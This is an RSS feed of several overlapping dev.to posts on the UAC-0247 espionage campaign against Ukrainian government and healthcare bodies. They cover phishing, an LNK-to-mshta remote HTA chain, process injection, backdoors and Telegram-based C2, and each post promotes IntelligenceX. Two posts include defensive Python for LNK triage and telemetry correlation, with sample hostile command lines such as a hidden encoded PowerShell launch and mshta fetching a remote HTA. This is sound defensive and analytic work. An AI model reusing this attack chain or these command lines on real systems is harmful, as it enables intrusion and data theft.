<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Abhay Negi</title>
    <description>The latest articles on DEV Community by Abhay Negi (@abhay_negi_3025afed85d9a4).</description>
    <link>https://dev.to/abhay_negi_3025afed85d9a4</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3734113%2Fa89fccbf-d789-4a18-ae81-3d5b454794b8.png</url>
      <title>DEV Community: Abhay Negi</title>
      <link>https://dev.to/abhay_negi_3025afed85d9a4</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/abhay_negi_3025afed85d9a4"/>
    <language>en</language>
    <item>
      <title>UAC-0247 Cyber Operation Highlights the Convergence of Social Engineering and Advanced Malware</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 08:25:12 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-operation-highlights-the-convergence-of-social-engineering-and-advanced-malware-5gh4</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-operation-highlights-the-convergence-of-social-engineering-and-advanced-malware-5gh4</guid>
      <description>&lt;p&gt;The UAC-0247 campaign represents a new phase in cyber threat evolution, where attackers combine human manipulation with highly technical malware frameworks. As reported by CERT-UA, this operation targeted Ukrainian government and healthcare institutions with the goal of gaining persistent access and extracting sensitive data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phishing as a Gateway
&lt;/h2&gt;

&lt;p&gt;The attack begins with phishing emails disguised as humanitarian communications. These emails are designed to appear legitimate, increasing the likelihood of user interaction.&lt;/p&gt;

&lt;p&gt;Victims are directed to malicious websites, where they are prompted to download a file that initiates the attack.&lt;/p&gt;

&lt;h2&gt;
  
  
  Advanced Execution Techniques
&lt;/h2&gt;

&lt;p&gt;The downloaded file is a Windows shortcut (LNK) that launches the built-in, signed utility mshta.exe to fetch and run a remote HTML Application (HTA). Because a legitimate Windows binary does the downloading and the executing, the activity blends into normal system behavior and evades tools that key on the malware file itself.&lt;/p&gt;

&lt;h2&gt;
  
  
  Persistence and Control
&lt;/h2&gt;

&lt;p&gt;RAVENSHELL, a reverse shell, gives the operators remote command execution; AGINGFLY, a C# backdoor, adds keystroke capture, file transfer and the deployment of further payloads; and the PowerShell-based SILENTLOOP keeps the implant reachable by retrieving current command-and-control addresses from Telegram channels, with fallbacks if that source is unavailable.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Exfiltration
&lt;/h2&gt;

&lt;p&gt;The attackers extract credentials, cookies and session data from Chromium-based browsers and WhatsApp Web for espionage, and in some cases also deploy cryptocurrency miners, which points to financial gain as a secondary objective.&lt;/p&gt;

&lt;h2&gt;
  
  
  Importance of Threat Intelligence
&lt;/h2&gt;

&lt;p&gt;Platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; play a critical role in identifying threats and exposed infrastructure.&lt;/p&gt;

&lt;p&gt;Using &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, organizations can proactively detect and mitigate risks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign underscores the need for proactive cybersecurity strategies and continuous monitoring.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>UAC-0247 Malware Campaign Shows How Cyber Attacks Are Targeting Real-World Infrastructure</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 08:14:12 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-malware-campaign-shows-how-cyber-attacks-are-targeting-real-world-infrastructure-1pil</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-malware-campaign-shows-how-cyber-attacks-are-targeting-real-world-infrastructure-1pil</guid>
      <description>&lt;p&gt;The growing sophistication of cyber threats is no longer limited to data breaches or financial fraud. The recently uncovered UAC-0247 campaign demonstrates how attackers are now focusing on disrupting and infiltrating real-world systems, including healthcare and government infrastructure. According to CERT-UA, this operation specifically targeted Ukrainian institutions with a carefully engineered multi-stage malware campaign designed for persistence and data extraction.&lt;/p&gt;

&lt;p&gt;Active during March and April 2026, the campaign reflects a broader trend where cyber operations are becoming more strategic, stealthy, and impactful. The attackers behind UAC-0247 used a blend of social engineering, exploitation of trusted platforms, and advanced malware techniques to achieve their objectives.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Human Element: Phishing as the Weakest Link
&lt;/h2&gt;

&lt;p&gt;At the core of this campaign lies a simple but highly effective tactic: phishing. Attackers sent emails disguised as humanitarian aid proposals, a theme chosen to evoke urgency and trust. In high-pressure environments, such messages are more likely to bypass skepticism.&lt;/p&gt;

&lt;p&gt;The email contains a link that leads either to a compromised legitimate website or to a fake page built with AI tools. Where a legitimate site is used, the attackers exploit a cross-site scripting vulnerability in it, so the link the victim sees points at a trusted domain while the injected script serves the malicious download.&lt;/p&gt;

&lt;p&gt;This stage is critical because it relies entirely on user interaction. Once the victim clicks the link and downloads the file, the attack chain begins.&lt;/p&gt;

&lt;h2&gt;
  
  
  Breaking Down the Attack Chain
&lt;/h2&gt;

&lt;p&gt;The downloaded file is typically a Windows shortcut (LNK). It looks like a document, but its target and arguments are the entry point for the malware.&lt;/p&gt;

&lt;p&gt;When the shortcut is opened, it runs “mshta.exe,” a legitimate, signed Windows utility, with a URL as its argument; mshta.exe then fetches and executes a remote HTML Application (HTA). The technique is widely used because the download and execution are performed by a trusted Windows binary rather than by anything the attacker has placed on the system.&lt;/p&gt;

&lt;p&gt;The HTA displays a decoy interface to keep the user occupied while it downloads additional payloads in the background. Those payloads inject shellcode into trusted processes such as RuntimeBroker.exe, so the malicious code runs under the name of a legitimate Windows process.&lt;/p&gt;

&lt;p&gt;More advanced versions of the attack use a two-stage loader. The second stage is implemented in a custom executable format with dynamic import resolution, and the payload is stored encrypted and compressed, which makes static analysis considerably harder.&lt;/p&gt;
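&lt;p&gt;As an added illustration (not code from the post or from CERT-UA), the following Python script performs the first triage step a responder would take on such a shortcut: it parses the Shell Link header and StringData fields as laid out in Microsoft's MS-SHLLINK specification and flags a shortcut whose target or arguments run mshta.exe against an http(s) URL. The sample shortcut is constructed inside the script; the path and URL in it are placeholders, not indicators from the campaign.&lt;/p&gt;

```python
"""Static triage of a Windows shortcut (.lnk): extract what it would launch."""
import re

# ShellLinkHeader layout from the MS-SHLLINK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bit positions (bit 0 is the least significant bit).
HAS_LINK_TARGET_ID_LIST = 0
HAS_LINK_INFO = 1
HAS_NAME = 2
HAS_RELATIVE_PATH = 3
HAS_WORKING_DIR = 4
HAS_ARGUMENTS = 5
HAS_ICON_LOCATION = 6
IS_UNICODE = 7

# StringData entries appear in this fixed order, each only if its flag is set.
STRING_DATA = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)

# Heuristic for the mshta-to-remote-HTA pattern described in the write-up.
REMOTE_MSHTA = re.compile(r"mshta(\.exe)?\b.*https?://", re.IGNORECASE)


def _flag(flags: int, bit: int) -> bool:
    """True if the given LinkFlags bit is set (shift-and-modulo bit test)."""
    return (flags >> bit) % 2 == 1


def _u16(data: bytes, offset: int) -> int:
    return int.from_bytes(data[offset:offset + 2], "little")


def _u32(data: bytes, offset: int) -> int:
    return int.from_bytes(data[offset:offset + 4], "little")


def _read_string(data: bytes, offset: int, unicode: bool):
    """Read one StringData entry: a 16-bit character count, then the chars."""
    count = _u16(data, offset)
    offset += 2
    width = 2 if unicode else 1
    raw = data[offset:offset + count * width]
    if len(raw) != count * width:
        raise ValueError("truncated StringData")
    text = raw.decode("utf-16-le" if unicode else "cp1252")
    return text, offset + count * width


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, path, arguments, ...) of a .lnk."""
    if len(data[:LNK_HEADER_SIZE]) != LNK_HEADER_SIZE:
        raise ValueError("file too short for a ShellLinkHeader")
    if _u32(data, 0) != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = _u32(data, 20)
    offset = LNK_HEADER_SIZE
    # Two optional variable-length structures precede StringData; skip them.
    if _flag(flags, HAS_LINK_TARGET_ID_LIST):
        offset += 2 + _u16(data, offset)      # IDListSize field + IDList
    if _flag(flags, HAS_LINK_INFO):
        offset += _u32(data, offset)          # LinkInfoSize counts itself
    fields = {}
    unicode = _flag(flags, IS_UNICODE)
    for name, bit in STRING_DATA:
        if _flag(flags, bit):
            fields[name], offset = _read_string(data, offset, unicode)
    return fields


def is_suspicious_lnk(data: bytes) -> bool:
    """Flag a shortcut whose path/arguments run mshta.exe against a URL."""
    fields = parse_lnk(data)
    command = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    return REMOTE_MSHTA.search(command) is not None


def build_lnk(name: str, relative_path: str, arguments: str) -> bytes:
    """Constructed sample only: a minimal Unicode .lnk with three StringData fields."""
    flags = sum(2 ** bit for bit in (HAS_NAME, HAS_RELATIVE_PATH, HAS_ARGUMENTS, IS_UNICODE))
    header = (
        LNK_HEADER_SIZE.to_bytes(4, "little") + LNK_CLSID + flags.to_bytes(4, "little")
        + bytes(4)                     # FileAttributes
        + bytes(24)                    # Creation/Access/Write times
        + bytes(4)                     # FileSize
        + bytes(4)                     # IconIndex
        + (1).to_bytes(4, "little")    # ShowCommand = SW_SHOWNORMAL
        + bytes(2) + bytes(2) + bytes(4) + bytes(4)   # HotKey, Reserved1-3
    )
    assert len(header) == LNK_HEADER_SIZE
    body = b""
    for text in (name, relative_path, arguments):
        body += len(text).to_bytes(2, "little") + text.encode("utf-16-le")
    return header + body


# Constructed sample shortcut modelled on the chain described above (placeholder URL, not an IOC).
SAMPLE_LNK = build_lnk(
    "Humanitarian aid proposal",
    r"..\..\..\Windows\System32\mshta.exe",
    "https://example.invalid/aid/proposal.hta",
)

if __name__ == "__main__":
    print(parse_lnk(SAMPLE_LNK))
    print("suspicious:", is_suspicious_lnk(SAMPLE_LNK))
```

&lt;p&gt;The parser skips the LinkTargetIDList and LinkInfo structures by their declared sizes because only the StringData fields matter for this check. A production triage script would also decode the target path from the ID list, since a shortcut can name mshta.exe there and leave the arguments field holding only the URL, in which case the heuristic above would miss it.&lt;/p&gt;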

&lt;h2&gt;
  
  
  Establishing Long-Term Control
&lt;/h2&gt;

&lt;p&gt;Once the system is compromised, the attackers keep their access through a reverse shell known as RAVENSHELL, which opens a command channel from the infected host back to a remote command-and-control server.&lt;/p&gt;

&lt;p&gt;In addition, the AGINGFLY malware family is deployed. This component provides attackers with full control over the system, enabling them to execute commands, capture keystrokes, and transfer files.&lt;/p&gt;

&lt;p&gt;The PowerShell-based SILENTLOOP module ensures continuous communication by retrieving command-and-control server addresses from Telegram channels, with fallback mechanisms if that source is unavailable. Because the addresses are fetched at run time rather than hard-coded, taking down a single server does not break the implant.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Theft and Expansion
&lt;/h2&gt;

&lt;p&gt;The primary goal of the campaign is to extract sensitive data. Attackers target browser-stored credentials, cookies, and session tokens from Chromium-based browsers. They also use tools to access WhatsApp Web data, giving them insight into private communications.&lt;/p&gt;

&lt;p&gt;Beyond data theft, attackers perform reconnaissance and lateral movement within the network. This allows them to expand their reach and compromise additional systems.&lt;/p&gt;

&lt;p&gt;In some cases, cryptocurrency mining tools have been observed, suggesting that financial gain may be a secondary objective.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Need for Better Visibility
&lt;/h2&gt;

&lt;p&gt;One of the biggest challenges in defending against such attacks is the lack of visibility into exposed systems and malicious infrastructure. Traditional security tools often miss these threats because they rely on known file signatures, while this chain consists largely of signed Windows binaries and freshly built, encrypted payloads.&lt;/p&gt;

&lt;p&gt;This is where platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; become highly valuable. &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; provides insights into exposed assets, malicious domains, and attacker infrastructure, helping organizations identify threats before they escalate.&lt;/p&gt;

&lt;p&gt;By leveraging &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, security teams can monitor suspicious activity, analyze patterns, and take proactive measures to reduce risk.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mitigation Strategies
&lt;/h2&gt;

&lt;p&gt;Organizations should block or restrict the execution of LNK, HTA, and script-based files received from outside, for example by blocking mshta.exe, wscript.exe, and cscript.exe with AppLocker or Windows Defender Application Control and by denying mshta.exe outbound network access, since this chain depends on it fetching a remote HTA. PowerShell should be constrained where it is not needed, and its script block logging enabled so that loaders such as SILENTLOOP leave a record.&lt;/p&gt;

&lt;p&gt;User education is also critical. Employees should be trained to recognize phishing attempts and avoid interacting with suspicious emails.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign highlights the evolving nature of cyber threats. Organizations must move beyond reactive security measures and adopt proactive, intelligence-driven strategies to protect their systems.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>UAC-0247 Cyberattack Campaign Signals Escalation in Targeted Attacks on Healthcare and Government Infrastructure</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 08:07:47 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyberattack-campaign-signals-escalation-in-targeted-attacks-on-healthcare-and-government-531e</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyberattack-campaign-signals-escalation-in-targeted-attacks-on-healthcare-and-government-531e</guid>
      <description>&lt;p&gt;The cybersecurity landscape continues to shift toward more targeted, stealth-driven operations, and the UAC-0247 campaign is a clear example of this evolution. Recently disclosed by CERT-UA, this campaign specifically targeted Ukrainian government institutions and healthcare organizations, including clinics and emergency response facilities, with a sophisticated malware framework engineered for persistence, surveillance, and large-scale data exfiltration.&lt;/p&gt;

&lt;p&gt;Observed between March and April 2026, the campaign reflects a calculated and multi-layered approach that combines social engineering, exploitation of trusted systems, and advanced malware deployment techniques. While attribution remains unclear, the operational discipline and technical complexity strongly suggest involvement from a well-funded and organized threat group.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phishing Strategy Tailored for Maximum Impact
&lt;/h2&gt;

&lt;p&gt;The initial access vector used in this campaign revolves around phishing emails that appear to be legitimate humanitarian aid proposals. This theme is strategically chosen to exploit trust, urgency, and emotional response, particularly in environments where such communications are common.&lt;/p&gt;

&lt;p&gt;Recipients who engage with these emails are directed to malicious links. These lead either to compromised legitimate websites, where the attackers exploit vulnerabilities such as cross-site scripting so that a trusted domain serves the injected content, or to convincing fake websites generated using artificial intelligence tools.&lt;/p&gt;

&lt;p&gt;This dual approach significantly increases success rates. Victims are more likely to trust a legitimate domain, while AI-generated phishing pages allow attackers to scale operations without sacrificing realism. The ultimate objective is to trick users into downloading a malicious file disguised as legitimate content.&lt;/p&gt;

&lt;h2&gt;
  
  
  Execution Chain: A Layered Approach to System Compromise
&lt;/h2&gt;

&lt;p&gt;Once the victim downloads the file, the attack progresses through a carefully structured execution chain. The file is typically a Windows shortcut (LNK) whose target and arguments, rather than any embedded executable, start the infection.&lt;/p&gt;

&lt;p&gt;When opened, the shortcut launches the built-in Windows utility “mshta.exe” with a remote URL, and mshta.exe fetches and executes the HTML Application (HTA) found there. Attackers favor this technique because a signed Windows binary performs both the download and the execution, so endpoint tools see a trusted image doing the work.&lt;/p&gt;

&lt;p&gt;The HTA presents a decoy interface to the victim, creating the impression of a normal document, while in the background it downloads additional payloads and injects shellcode into trusted processes such as RuntimeBroker.exe.&lt;/p&gt;

&lt;p&gt;The injection step matters because the malicious code then runs under the name, and with the reputation, of a legitimate Windows process, which defeats controls that judge activity by the executing image alone.&lt;/p&gt;

&lt;p&gt;In more advanced cases, the attackers deploy a two-stage loader. The second stage is built in a custom executable format with dynamic import resolution and structured execution, and the payload is stored encrypted and compressed, which makes static analysis and signature-based detection significantly harder.&lt;/p&gt;

&lt;h2&gt;
  
  
  Persistence and Command-and-Control Mechanisms
&lt;/h2&gt;

&lt;p&gt;Maintaining access is a critical component of the campaign. To achieve this, attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection to a command-and-control server.&lt;/p&gt;

&lt;p&gt;This allows attackers to execute commands remotely, using standard tools such as cmd.exe, which further reduces the likelihood of detection.&lt;/p&gt;

&lt;p&gt;In addition to RAVENSHELL, the attackers deploy a malware family known as AGINGFLY. Developed in C#, this malware provides extensive control over compromised systems, enabling attackers to execute commands, capture keystrokes, download files, and deploy additional payloads.&lt;/p&gt;

&lt;p&gt;Another key component is SILENTLOOP, a PowerShell-based script designed to enhance resilience. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to ensure continuous operation even if primary infrastructure is disrupted.&lt;/p&gt;
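&lt;p&gt;The execution chain above (explorer.exe launching mshta.exe with a URL, a script host spawned from mshta.exe, a remote thread created in RuntimeBroker.exe) and the SILENTLOOP behavior of resolving command-and-control addresses through Telegram each leave a distinct trace in endpoint telemetry. The Python below, an added example rather than CERT-UA's published detection logic, runs one rule per stage over constructed Sysmon-style events and escalates hosts on which several stages line up. Hostnames, paths, and domains in the sample events are placeholders, not campaign indicators.&lt;/p&gt;

```python
"""Correlate the LNK -> mshta -> injection -> Telegram C2 chain over endpoint events.
Added example: the rules here are the editor's, not CERT-UA's published detections."""
import json
import re
from collections import defaultdict

# Constructed telemetry as JSON lines. Event type names mirror Sysmon's
# ProcessCreate (ID 1), NetworkConnect (ID 3) and CreateRemoteThread (ID 8).
SAMPLE_EVENTS = r"""
{"host":"ws-17","type":"ProcessCreate","image":"C:\\Windows\\System32\\mshta.exe","parent":"C:\\Windows\\explorer.exe","cmdline":"mshta.exe https://aid-portal.invalid/proposal.hta"}
{"host":"ws-17","type":"ProcessCreate","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent":"C:\\Windows\\System32\\mshta.exe","cmdline":"powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"host":"ws-17","type":"CreateRemoteThread","source_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","target_image":"C:\\Windows\\System32\\RuntimeBroker.exe"}
{"host":"ws-17","type":"NetworkConnect","image":"C:\\Windows\\System32\\RuntimeBroker.exe","dest_host":"api.telegram.org","dest_port":443}
{"host":"ws-02","type":"ProcessCreate","image":"C:\\Windows\\System32\\mshta.exe","parent":"C:\\Windows\\explorer.exe","cmdline":"mshta.exe C:\\Tools\\inventory.hta"}
{"host":"ws-02","type":"NetworkConnect","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest_host":"t.me","dest_port":443}
"""

TELEGRAM_HOSTS = {"t.me", "api.telegram.org", "telegram.org"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
INJECTION_TARGETS = {"runtimebroker.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path (last backslash component)."""
    return path.rsplit("\\", 1)[-1].lower()


def stage_remote_hta(ev: dict):
    """LNK double-click: mshta.exe started with a URL argument (remote HTA)."""
    if ev["type"] == "ProcessCreate" and image_name(ev["image"]) == "mshta.exe":
        if URL_RE.search(ev.get("cmdline", "")):
            return "remote_hta"
    return None


def stage_script_child(ev: dict):
    """Second-stage script host spawned by mshta.exe."""
    if ev["type"] == "ProcessCreate" and image_name(ev["parent"]) == "mshta.exe":
        if image_name(ev["image"]) in SCRIPT_HOSTS:
            return "script_child"
    return None


def stage_injection(ev: dict):
    """Remote thread created in the injection target named in the write-up."""
    if ev["type"] == "CreateRemoteThread":
        if image_name(ev["target_image"]) in INJECTION_TARGETS:
            return "injection"
    return None


def stage_telegram_c2(ev: dict):
    """Script host or injection target contacting Telegram (SILENTLOOP-style lookup)."""
    if ev["type"] == "NetworkConnect" and ev.get("dest_host", "").lower() in TELEGRAM_HOSTS:
        if image_name(ev["image"]) in SCRIPT_HOSTS | INJECTION_TARGETS:
            return "telegram_c2"
    return None


RULES = (stage_remote_hta, stage_script_child, stage_injection, stage_telegram_c2)


def parse_events(text: str) -> list:
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def correlate(events: list) -> dict:
    """Map each host to the ordered list of distinct chain stages seen on it."""
    stages = defaultdict(list)
    for ev in events:
        for rule in RULES:
            stage = rule(ev)
            if stage and stage not in stages[ev["host"]]:
                stages[ev["host"]].append(stage)
    return dict(stages)


def escalate(stages: dict, minimum: int = 2) -> list:
    """Hosts on which at least `minimum` distinct stages of the chain were seen."""
    return sorted(host for host, seen in stages.items() if len(seen) >= minimum)


if __name__ == "__main__":
    seen = correlate(parse_events(SAMPLE_EVENTS))
    for host, chain in seen.items():
        print(host, "->", chain)
    print("escalate:", escalate(seen))
```

&lt;p&gt;Requiring two or more stages per host is what keeps the legitimate local mshta.exe use on ws-02 and a browser visiting t.me from alerting on their own; the minimum and the host lists should be tuned to the environment, and any single hit on the injection rule still deserves a look.&lt;/p&gt;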

&lt;h2&gt;
  
  
  Data Exfiltration and Post-Exploitation Activities
&lt;/h2&gt;

&lt;p&gt;The primary objective of the UAC-0247 campaign is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including stored credentials, cookies, and session data.&lt;/p&gt;

&lt;p&gt;They also deploy specialized tools to extract data from WhatsApp Web, allowing access to private communications.&lt;/p&gt;

&lt;p&gt;Beyond data exfiltration, the attackers conduct reconnaissance and lateral movement within compromised networks. Tools used in the campaign enable network scanning, tunneling, and expansion into additional systems.&lt;/p&gt;

&lt;p&gt;In some cases, cryptocurrency mining tools have also been observed, suggesting that financial gain may be a secondary objective.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Traditional Security Measures Are Not Enough
&lt;/h2&gt;

&lt;p&gt;The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system tools, encrypting payloads, and using multi-stage execution chains, attackers can operate without triggering traditional security alerts.&lt;/p&gt;

&lt;p&gt;This is where platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; become essential. &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; provides organizations with visibility into exposed assets, malicious infrastructure, and emerging threat patterns.&lt;/p&gt;

&lt;p&gt;By using &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, security teams can identify suspicious domains, monitor attacker infrastructure, and correlate threat intelligence across multiple sources.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mitigation and Defense Strategies
&lt;/h2&gt;

&lt;p&gt;Organizations should restrict execution of high-risk file types such as LNK, HTA, and JavaScript files, and block the utilities that run them (mshta.exe, wscript.exe, cscript.exe) through AppLocker or Windows Defender Application Control. Denying mshta.exe outbound network access breaks this particular chain at the remote HTA step, and constraining PowerShell while enabling its script block logging limits and records loaders such as SILENTLOOP.&lt;/p&gt;

&lt;p&gt;User awareness training is equally important, as phishing remains one of the most effective attack vectors.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign highlights the growing sophistication of cyber threats targeting critical infrastructure. Organizations must adopt proactive, intelligence-driven security strategies to defend against these evolving risks.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Advanced Cyber Espionage Campaign UAC-0247 Targets Ukraine’s Critical Systems</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 07:30:11 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/advanced-cyber-espionage-campaign-uac-0247-targets-ukraines-critical-systems-3f0d</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/advanced-cyber-espionage-campaign-uac-0247-targets-ukraines-critical-systems-3f0d</guid>
      <description>&lt;p&gt;The discovery of UAC-0247 marks another escalation in cyber operations targeting critical infrastructure. According to CERT-UA, the campaign leveraged a combination of phishing, malware, and stealth techniques to infiltrate Ukrainian government and healthcare networks.&lt;/p&gt;

&lt;h2&gt;
  
  
  Social Engineering Meets Technical Exploitation
&lt;/h2&gt;

&lt;p&gt;The campaign begins with phishing emails that appear to be humanitarian communications. These emails direct victims to malicious websites designed to deliver malware.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sophisticated Malware Deployment
&lt;/h2&gt;

&lt;p&gt;The attack chain runs from a Windows shortcut (LNK) through mshta.exe and a remote HTA to shellcode injected into legitimate processes such as RuntimeBroker.exe, so the malware's activity is attributed to trusted system binaries and is harder to spot.&lt;/p&gt;

&lt;h2&gt;
  
  
  Command and Control Infrastructure
&lt;/h2&gt;

&lt;p&gt;RAVENSHELL (a reverse shell) and AGINGFLY (a C# backdoor) provide remote access and control, while the PowerShell-based SILENTLOOP keeps the implant reachable by fetching command-and-control addresses from Telegram channels.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Theft and Impact
&lt;/h2&gt;

&lt;p&gt;The attackers extract credentials, cookies and session data from Chromium-based browsers and WhatsApp Web for espionage, and in some cases deploy cryptocurrency miners as a secondary source of financial gain.&lt;/p&gt;

&lt;h2&gt;
  
  
  Role of Intelligence Platforms
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; helps organizations detect exposed assets and malicious infrastructure.&lt;/p&gt;

&lt;p&gt;Using &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, teams can proactively identify threats and reduce risk.&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;This campaign highlights the need for continuous monitoring and intelligence-driven security strategies.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>UAC-0247 Cyber Campaign Exposes Critical Weaknesses in Government and Healthcare Security</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 07:26:46 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-campaign-exposes-critical-weaknesses-in-government-and-healthcare-security-9ah</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-campaign-exposes-critical-weaknesses-in-government-and-healthcare-security-9ah</guid>
      <description>&lt;p&gt;A recently uncovered cyber campaign, tracked as UAC-0247, has once again highlighted the growing sophistication of attacks targeting critical infrastructure. According to findings published by CERT-UA, the operation specifically targeted Ukrainian government agencies and healthcare institutions, including clinics and emergency response units, using a highly structured malware delivery chain.&lt;/p&gt;

&lt;p&gt;The campaign, active between March and April 2026, demonstrates how modern cyber threats are evolving beyond simple attacks into complex, multi-layered operations that combine social engineering, malware development, and stealth persistence mechanisms. While attribution remains uncertain, the technical execution suggests a capable and organized threat actor.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phishing as a Strategic Entry Point
&lt;/h2&gt;

&lt;p&gt;The attackers initiated the campaign using phishing emails disguised as humanitarian aid proposals. This tactic is particularly effective because it leverages trust and urgency, especially in environments where such communications are common.&lt;/p&gt;

&lt;p&gt;Recipients who clicked the embedded links were redirected to either compromised legitimate websites or AI-generated phishing pages. In cases involving legitimate domains, attackers exploited cross-site scripting vulnerabilities to inject malicious code. This approach significantly increases the likelihood of successful compromise because users tend to trust known websites.&lt;/p&gt;

&lt;p&gt;The objective at this stage was to convince victims to download a malicious file disguised as legitimate content.&lt;/p&gt;

&lt;h2&gt;
  
  
  Execution Chain: From LNK to Full Compromise
&lt;/h2&gt;

&lt;p&gt;The downloaded file is a Windows shortcut (LNK). Opening it launches the Windows utility “mshta.exe” with a remote URL, so that mshta.exe fetches and executes an HTML Application (HTA); the utility is frequently abused precisely because it is a signed, legitimate part of Windows.&lt;/p&gt;

&lt;p&gt;The HTA file presents a decoy interface to the user while silently executing malicious actions in the background. It downloads additional payloads and injects shellcode into trusted system processes such as RuntimeBroker.exe, so the malicious code runs under the name of a legitimate process and slips past tools that judge activity by the executing image.&lt;/p&gt;

&lt;p&gt;More advanced variants of the campaign use a two-stage loader architecture. The second stage is implemented using a custom executable format that supports dynamic linking and structured execution. The payload is encrypted and compressed, making analysis and detection significantly more difficult.&lt;/p&gt;

&lt;h2&gt;
  
  
  Persistence Through Advanced Control Mechanisms
&lt;/h2&gt;

&lt;p&gt;To maintain access, attackers deploy a reverse shell known as RAVENSHELL. This establishes a persistent communication channel with a command-and-control server, enabling remote execution of commands.&lt;/p&gt;

&lt;p&gt;In addition, the AGINGFLY malware family is deployed. Written in C#, it provides attackers with extensive control over the compromised system, including the ability to execute commands, capture keystrokes, transfer files, and deploy additional payloads.&lt;/p&gt;

&lt;p&gt;A PowerShell script called SILENTLOOP enhances resilience by dynamically retrieving command-and-control server addresses from Telegram channels. This ensures that the malware can continue operating even if primary infrastructure is disrupted.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Exfiltration and Lateral Movement
&lt;/h2&gt;

